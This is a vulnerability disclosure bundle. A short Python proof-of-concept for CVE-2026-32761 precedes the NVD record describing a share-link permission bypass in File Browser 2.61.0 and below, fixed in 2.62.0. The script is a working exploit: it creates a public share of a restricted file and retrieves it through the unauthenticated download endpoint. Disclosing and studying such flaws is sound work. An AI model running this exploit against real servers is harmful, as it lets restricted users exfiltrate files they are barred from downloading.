CVE-2026-32761

# PoC for CVE-2026-32761 # Description: Exploit permission bypass by creating a share and downloading via public link. import requests target = "http://example.com:8080" api_token = "YOUR_SESSION_TOKEN" file_path = "restricted_file.txt" headers = {"X-Auth": api_token, "Content-Type": "application/json"} # Step 1: Create a public share using share permission share_url = f"{target}/api/resources/share" payload = {"path": file_path} response = requests.post(share_url, headers=headers, json=payload) if response.status_code == 200 and 'hash' in response.json(): share_hash = response.json()['hash'] print(f"[+] Share created: {share_hash}") # Step 2: Access the file via public download endpoint bypassing download permission check public_dl_url = f"{target}/api/public/dl/{share_hash}/{file_path}" file_response = requests.get(public_dl_url) if file_response.status_code == 200: print("[+] Exploit successful! File content downloaded:") print(file_response.text) else: print("[-] Failed to create share or exploit failed.")

{"cve": {"id": "CVE-2026-32761", "sourceIdentifier": "[email protected]", "published": "2026-03-20T00:16:17.617", "lastModified": "2026-03-23T16:56:04.520", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "File Browser is a file managing interface for uploading, deleting, previewing, renaming, and editing files within a specified directory. Versions 2.61.0 and below contain a permission enforcement bypass which allows users who are denied download privileges (perm.download = false) but granted share privileges (perm.share = true) to exfiltrate file content by creating public share links. While the direct raw download endpoint (/api/raw/) correctly enforces the download permission, the share creation endpoint only checks Perm.Share, and the public download handler (/api/public/dl/<hash>) serves file content without verifying that the original file owner has download permission. This means any authenticated user with share access can circumvent download restrictions by sharing a file and then retrieving it via the unauthenticated public download URL. The vulnerability undermines data-loss prevention and role-separation policies, as restricted users can publicly distribute files they are explicitly blocked from downloading directly. This issue has been fixed in version 2.62.0."}, {"lang": "es", "value": "Navegador de Archivos es una interfaz de gestión de archivos para cargar, eliminar, previsualizar, renombrar y editar archivos dentro de un directorio especificado. Las versiones 2.61.0 e inferiores contienen un bypass de aplicación de permisos que permite a los usuarios a quienes se les deniegan los privilegios de descarga (perm.download = false) pero se les conceden privilegios de compartir (perm.share = true) exfiltrar contenido de archivos mediante la creación de enlaces de compartición públicos. Mientras que el endpoint de descarga directa en bruto (/api/raw/) aplica correctamente el permiso de descarga, el endpoint de creación de compartición solo verifica Perm.Share, y el gestor de descarga pública (/api/public/dl/) sirve contenido de archivos sin verificar que el propietario original del archivo tenga permiso de descarga. Esto significa que cualquier usuario autenticado con acceso de compartición puede eludir las restricciones de descarga compartiendo un archivo y luego recuperándolo a través de la URL de descarga pública no autenticada. La vulnerabilidad socava las políticas de prevención de pérdida de datos y de separación de roles, ya que los usuarios restringidos pueden distribuir públicamente archivos que tienen explícitamente bloqueada la descarga directa. Este problema ha sido solucionado en la versión 2.62.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-284"}, {"lang": "en", "value": "CWE-639"}, {"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:filebrowser:filebrowser:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.62.0", "matchCriteriaId": "7E5C9E4B-8749-44EA-AB8D-1292D4C9DB65"}]}]}], "references": [{"url": "https://github.com/filebrowser/filebrowser/commit/09a26166b4f79446e7174c017380f6db45444e32", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/filebrowser/filebrowser/releases/tag/v2.62.0", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/filebrowser/filebrowser/security/advisories/GHSA-68j5-4m99-w9w9", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}